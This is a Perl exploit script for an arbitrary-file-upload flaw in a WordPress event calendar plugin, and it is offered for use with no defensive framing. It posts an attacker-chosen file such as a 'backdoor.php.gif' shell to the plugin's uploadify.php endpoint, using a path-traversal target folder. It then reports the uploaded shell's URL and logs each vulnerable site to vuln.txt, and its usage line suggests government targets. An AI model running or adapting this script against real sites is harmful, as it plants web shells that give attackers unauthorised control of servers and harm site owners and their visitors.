#!/usr/bin/perl
#EXPLOIT: http://www.exploit4arab.net/exploits/1433
use LWP::UserAgent;
use strict;
use warnings;

sub banner {
print "[!] [ EXPLOIT NAME ]: Wordpress event Calendar Plugin - (AFU)Arbitrary File Upload / EDIT GoogleINURL\n";
print "[!] [ usage ]:        perl $0 www.target.gov.crot backdoor.php.gif\n";
print "--------------------------------------------------------------------------------------------------------------------\n";
}
if (!defined ($ARGV[0] && $ARGV[1])) { banner(); exit; }
my $target = $ARGV[0]; my $file = $ARGV[1];
my $ua = LWP::UserAgent->new(agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);
my $ch = $ua->post("http://$target/wp-content/plugins/php-event-calendar/server/classes/uploadify.php", Content_Type => 'form-data', Content => [ 'Filedata' => [$file] , targetFolder => '../../../../../' , user_id => '0day' ])->content;
if($ch =~/1/) { 
print "\n  [+] [ INFO ] SHELL:: http://$target/$file";
print "\n  [+] [ INFO ] File Uploaded !\n";
open(my $file_,">>","vuln.txt") || die("error $!");
print $file_ "http://$target/$file\n";
close($file_);
} else { print "\n  [x] [ ERROR ]  Target not Vuln\n"; }